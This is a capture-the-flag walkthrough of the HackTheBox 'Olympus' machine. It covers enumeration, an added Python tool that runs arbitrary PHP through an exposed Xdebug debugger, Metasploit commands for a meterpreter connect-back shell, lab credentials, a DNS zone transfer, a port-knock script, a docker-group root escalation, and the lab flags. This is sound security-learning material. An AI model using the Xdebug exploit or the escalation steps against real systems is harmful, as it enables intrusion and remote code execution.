October 10, 2018

HackTheBox - Olympus

It’s been almost a week since my last writeup. So here I am with a writeup on a newly retired machine, Olympus. This was a good one; it took me quite a long time to hack. So, let’s get started.


Target Information

IP Address : 10.10.10.83
OS Family : Linux
Hostname : Olympus

Host Information

IP Address : 10.10.14.21
OS Family : Linux
Hostname : LocalHost

Now, our first step will be enumerating the services running on the machine.

Enumeration

I use Nmap for enumeration purposes. So, I loaded my terminal & started with

mkdir nmap
nmap -sV -sC -oA nmap/primary 10.10.10.83

Here,

  • -sV returns info related to the services & their version
  • -sC runs default nmap scripts
  • -oA saves output in all formats (XML, nmap, gnmap) in nmap/primary

The scan shows that TCP ports 53, 80 and 2222 are open. Let’s visit port 80 first.

The site just serves a single image; nothing useful there either. Let’s run a UDP scan as well.

nmap -v -sU -sC -Pn -oA nmap/secondary 10.10.10.83

Here,

  • -v scans in verbose mode
  • -sU does a UDP scan
  • -sC runs default nmap scripts
  • -Pn skips host discovery and treats the host as up
  • -oA saves output in all formats (XML, nmap, gnmap) in nmap/secondary

UDP port 53 is open too, so DNS is definitely in play. Other than that there is nothing obviously useful: the SSH on 2222 needs credentials. So let’s look at the web server’s requests and responses more closely; I use Burp Suite for that.

Now that’s something really useful: the response headers reveal Xdebug 2.5.5. Xdebug is a PHP extension used for debugging. When remote debugging is enabled with xdebug.remote_connect_back, the PHP process connects back to whoever sent a request carrying XDEBUG_SESSION_START and accepts DBGp debugger commands from them, including eval, which runs arbitrary PHP. No authentication is involved, so a reachable listener on our side is all it takes. Let’s get into it.
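To make clear what the Metasploit module below actually does, here is the same exchange written out in Python. This is an added example, not code from the original writeup or from the Metasploit module. It assumes Xdebug’s default xdebug.remote_port of 9000, that the target can connect back to our machine (the module only works under the same condition), and that remote_connect_back is on. The frame format (decimal length, NUL, XML, NUL) and the eval command syntax are from the DBGp protocol; the fake_xdebug/simulate pair is test scaffolding that plays the PHP side over a socketpair so the exchange can be exercised offline.

```python
import base64
import socket
import threading
import xml.etree.ElementTree as ET

DBGP_PORT = 9000  # Xdebug 2.x default for xdebug.remote_port

def build_trigger_request(host: str, path: str = "/") -> bytes:
    """HTTP request that makes Xdebug open a debug session. With
    xdebug.remote_connect_back=1, PHP connects back to the requester's
    address on xdebug.remote_port, so we only have to be listening there."""
    return (f"GET {path}?XDEBUG_SESSION_START=1 HTTP/1.1\r\nHost: {host}\r\n"
            "Cookie: XDEBUG_SESSION=1\r\nConnection: close\r\n\r\n").encode()

def build_eval(php_expr: str, transaction_id: int = 1) -> bytes:
    """DBGp 'eval' command. The PHP expression travels base64-encoded after
    '--'; Xdebug evaluates it as 'return <expr>;', so pass an expression."""
    payload = base64.b64encode(php_expr.encode()).decode()
    return f"eval -i {transaction_id} -- {payload}\x00".encode()

def parse_dbgp_frame(buf: bytes):
    """Split one frame ('<decimal length>\\0<xml>\\0') off the front of buf.
    Returns (xml_text, rest), or (None, buf) while the frame is incomplete."""
    sep = buf.find(b"\x00")
    if sep < 0:
        return None, buf
    start, end = sep + 1, sep + 1 + int(buf[:sep])
    if len(buf) < end + 1:  # payload plus its trailing NUL must be present
        return None, buf
    return buf[start:end].decode(), buf[end + 1:]

def extract_eval_result(xml_text: str) -> str:
    """Value carried by an eval <response>: a <property>, base64 for strings."""
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if el.tag.split("}")[-1] == "property":
            text = el.text or ""
            if el.get("encoding") == "base64":
                return base64.b64decode(text).decode(errors="replace")
            return text
    return ""

def recv_frame(sock: socket.socket, buf: bytes = b""):
    """Read from sock until one complete DBGp frame has arrived."""
    while True:
        xml_text, buf = parse_dbgp_frame(buf)
        if xml_text is not None:
            return xml_text, buf
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("DBGp peer closed the connection")
        buf += chunk

def run_eval(conn: socket.socket, php_expr: str) -> str:
    """Drive one session on an accepted connect-back: Xdebug speaks first
    with an <init> frame, then we send eval and decode what comes back."""
    init_xml, buf = recv_frame(conn)
    if ET.fromstring(init_xml).tag.split("}")[-1] != "init":
        raise ValueError("expected a DBGp <init> frame")
    conn.sendall(build_eval(php_expr))
    resp_xml, _ = recv_frame(conn, buf)
    return extract_eval_result(resp_xml)

def exploit(target: str, php_expr: str, http_port: int = 80) -> str:
    """Listen on 9000, send the trigger request, run php_expr on the connect-back.
    Usage against the box: exploit("10.10.10.83", "shell_exec('id')")"""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", DBGP_PORT))
        srv.listen(1)
        srv.settimeout(15)
        with socket.create_connection((target, http_port), timeout=10) as web:
            web.sendall(build_trigger_request(target))
            conn, _ = srv.accept()  # PHP is now blocked waiting for our commands
        with conn:
            return run_eval(conn, php_expr)

def fake_xdebug(conn: socket.socket, output: str) -> None:
    """Stand-in for the PHP side, for offline testing only: send <init>, read
    one eval command, answer with 'output' as a base64-encoded string."""
    init = '<init xmlns="urn:debugger_protocol_v1" language="PHP"></init>'
    conn.sendall(f"{len(init)}\x00{init}\x00".encode())
    cmd = b""
    while not cmd.endswith(b"\x00"):
        cmd += conn.recv(4096) or b"\x00"
    body = base64.b64encode(output.encode()).decode()
    resp = ('<response xmlns="urn:debugger_protocol_v1" command="eval" transaction_id="1">'
            f'<property type="string" encoding="base64"><![CDATA[{body}]]></property></response>')
    conn.sendall(f"{len(resp)}\x00{resp}\x00".encode())

def simulate(php_expr: str, output: str) -> str:
    """Run the whole exchange over a socketpair, with no network involved."""
    ours, theirs = socket.socketpair()
    with ours, theirs:
        t = threading.Thread(target=fake_xdebug, args=(theirs, output))
        t.start()
        result = run_eval(ours, php_expr)
        t.join()
    return result
```

The important detail for defenders is that nothing in this exchange is authenticated: the only "secret" is knowing to send XDEBUG_SESSION_START, and the Xdebug response header hands that knowledge out. Leaving remote debugging enabled on anything reachable from untrusted networks is the whole vulnerability.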

Exploitation

Let’s fire up Metasploit & search for exploits.
msfconsole
search xdebug

Yeah !! We found one. Now let’s use it.
use exploit/unix/http/xdebug_unauth_exec
set RHOST 10.10.10.83
set LHOST 10.10.14.21
exploit

Yay !! We got a meterpreter shell. Let’s explore it.

We land in the home directory of user zeus. Let’s explore it too.

There is a directory airgeddon, which itself contains several directories and files. The most interesting one is the captured directory, which holds two files: captured.cap and papyrus.txt. Let’s look at them.

Let’s open captured.cap in Wireshark.

Here we see an SSID, Too_cl0se_to_th3_Sun. After digging into the contents of papyrus.txt as well, I ended up with the following SSH credentials (for the SSH on port 2222):

Username : icarus
Password : Too_cl0se_to_th3_Sun

Now, let’s log in with them.

Still nothing of use. This is where most people, me included, got stuck. Then I focused on the contents of help_of_the_gods.txt, which mentions the domain ctfolympus.htb. That’s the only lead, and it is the same domain that appeared in the primary nmap scan. DNS is worth a closer look: TCP port 53 is open, which is what a zone transfer (AXFR) needs, so let’s ask the server for the whole zone.

dig AXFR ctfolympus.htb @10.10.10.83

The zone transfer succeeds (the server allows AXFR from anyone), and the zone shows that Docker is in play: three hostnames, crete, hades and rhodes, plus a TXT record with the message Prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_Fire!. That is the hint for getting into hades: 3456 8234 62431 is a port-knocking sequence, prometheus is the username and St34l_th3_Fire! is the password.

Let’s script it as hack.sh: knock the ports in order, then connect to the SSH service (port 22) that the knock opens up.

#!/bin/bash
# Knock the three ports from the TXT record, in order, then connect to the
# SSH service that the knock sequence unfilters.

ports="3456 8234 62431"
host="10.10.10.83"
for x in $ports
do
	# -Pn skips host discovery, so the only packet sent is the probe to the knock port
	nmap -Pn -p "$x" "$host"
	sleep 1
done
ssh prometheus@"${host}"

Now, let’s execute it.

After entering the password we’re in as prometheus. Now let’s look around and grab the user flag.
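As an added example (not part of the original writeup), here is the knock done in Python with the check I would want before typing the ssh command: is port 22 actually reachable afterwards, and was it unreachable before? It assumes a knockd-style daemon that only needs to see a TCP SYN on each port in order, that the protected service is SSH on port 22, and it takes the sequence from the TXT record text quoted above rather than hardcoding it, so the same code works for any hint of that shape.

```python
import re
import socket
import time

# TXT record from the ctfolympus.htb zone transfer, as quoted in the writeup
KNOCK_HINT = "Prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_Fire!"

def parse_knock_hint(txt: str) -> list:
    """Pull the knock sequence out of the TXT record: the run of numbers in
    parentheses. Each value is validated as a TCP port."""
    m = re.search(r"\(([\d\s]+)\)", txt)
    if not m:
        raise ValueError("no port sequence found in TXT record")
    ports = [int(p) for p in m.group(1).split()]
    bad = [p for p in ports if not 1 <= p <= 65535]
    if bad:
        raise ValueError(f"invalid port(s): {bad}")
    return ports

def is_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """True if a TCP connect to host:port completes (service reachable)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

def knock(host: str, ports: list, delay: float = 0.5, timeout: float = 1.0) -> None:
    """One connection attempt per port, in order. knockd only watches for the
    SYN, so it does not matter that the ports are closed or filtered; keep the
    per-port timeout short so the whole sequence lands inside knockd's window."""
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect_ex((host, port))  # result deliberately ignored
        time.sleep(delay)

def open_portal(host: str, hint: str = KNOCK_HINT, ssh_port: int = 22) -> bool:
    """Knock and report whether the SSH port went from filtered to open."""
    before = is_open(host, ssh_port)
    knock(host, parse_knock_hint(hint))
    after = is_open(host, ssh_port)
    print(f"port {ssh_port}: reachable before={before} after={after}")
    return after

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.83"
    if open_portal(target):
        print(f"now run: ssh prometheus@{target}")
```

If the "after" check still fails, the usual causes are a knock that took longer than the daemon's sequence window, or a stray connection to the target in between (a background nmap, a browser tab) that reset the sequence; re-run with nothing else talking to the host.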

Privilege Escalation

Now it’s time to go for root. First, let’s see which groups prometheus belongs to:
groups

The output shows we’re in the docker group. That is effectively root: anyone who can talk to the Docker daemon can start a container with the host’s root filesystem bind-mounted inside it. The local olympia image does the job:
docker run -d -v /:/hostroot olympia

The container is now running detached with / mounted at /hostroot. Let’s exec into it with a shell (bcd is the start of the container ID that docker run printed):
docker exec -i -t bcd /bin/bash

Everything on the host is now under /hostroot inside the container, so the root flag can be read from there.

Flags

User : 8aa18519aff3c528c46bf675d6e88719
Root : aba486990e2e849e25c23f6e41e5e303

That night when we became gods… –Tyrell Wellick


And that’s it. Good Bye !!

NOTE : ALL PREVIOUS BLOG POSTS WERE DONE UNDER MY PREVIOUS ALIAS.
I NO LONGER USE THAT ALIAS.